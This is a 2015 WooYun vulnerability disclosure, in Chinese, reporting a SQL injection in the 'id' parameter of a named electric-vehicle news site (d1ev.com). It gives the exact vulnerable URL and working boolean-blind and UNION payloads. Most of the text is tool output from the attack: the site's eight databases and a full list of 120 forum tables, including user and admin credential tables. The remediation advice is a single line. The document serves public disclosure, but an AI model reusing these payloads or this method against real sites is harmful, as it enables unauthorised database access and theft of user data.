漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0132448
漏洞标题:电动汽车网SQL注入一枚
相关厂商:电动汽车网
漏洞作者: 路人甲
提交时间:2015-08-07 19:00
修复时间:2015-09-21 19:02
公开时间:2015-09-21 19:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
电动汽车网SQL注入一枚
详细说明:
http://www.d1ev.com/Public/getShowAll?id=39464 (GET)
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=39464) AND 9442=9442 AND (8711=8711
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=-2005) UNION ALL SELECT CONCAT(0x7172666671,0x506b7172744155564a63,0x7175617271)#
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
available databases [8]:
[*] ad
[*] bbs
[*] d1ev
[*] d1evbbs
[*] evcom
[*] information_schema
[*] mysql
[*] performance_schema
Database: bbs
[120 tables]
+--------------------------------+
| bbs_active_data |
| bbs_answer |
| bbs_answer_comments |
| bbs_answer_thanks |
| bbs_answer_uninterested |
| bbs_answer_vote |
| bbs_approval |
| bbs_article |
| bbs_article_comments |
| bbs_article_vote |
| bbs_attach |
| bbs_category |
| bbs_draft |
| bbs_edm_task |
| bbs_edm_taskdata |
| bbs_edm_unsubscription |
| bbs_edm_userdata |
| bbs_edm_usergroup |
| bbs_education_experience |
| bbs_favorite |
| bbs_favorite_tag |
| bbs_feature |
| bbs_feature_topic |
| bbs_geo_location |
| bbs_help_chapter |
| bbs_inbox |
| bbs_inbox_dialog |
| bbs_integral_log |
| bbs_invitation |
| bbs_jobs |
| bbs_mail_queue |
| bbs_nav_menu |
| bbs_notification |
| bbs_notification_data |
| bbs_pages |
| bbs_payment |
| bbs_posts_index |
| bbs_product_order |
| bbs_project |
| bbs_project_like |
| bbs_project_product |
| bbs_question |
| bbs_question_comments |
| bbs_question_focus |
| bbs_question_invite |
| bbs_question_thanks |
| bbs_question_uninterested |
| bbs_received_email |
| bbs_receiving_email_config |
| bbs_redirect |
| bbs_related_links |
| bbs_related_topic |
| bbs_report |
| bbs_reputation_category |
| bbs_reputation_topic |
| bbs_school |
| bbs_search_cache |
| bbs_sessions |
| bbs_system_setting |
| bbs_topic |
| bbs_topic_focus |
| bbs_topic_merge |
| bbs_topic_relation |
| bbs_user_action_history |
| bbs_user_action_history_data |
| bbs_user_action_history_fresh |
| bbs_user_follow |
| bbs_users |
| bbs_users_attrib |
| bbs_users_facebook |
| bbs_users_google |
| bbs_users_group |
| bbs_users_notification_setting |
| bbs_users_online |
| bbs_users_qq |
| bbs_users_sina |
| bbs_users_twitter |
| bbs_users_ucenter |
| bbs_users_weixin |
| bbs_verify_apply |
| bbs_weibo_msg |
| bbs_weixin_accounts |
| bbs_weixin_login |
| bbs_weixin_message |
| bbs_weixin_msg |
| bbs_weixin_qr_code |
| bbs_weixin_reply_rule |
| bbs_weixin_third_party_api |
| bbs_work_experience |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+--------------------------------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝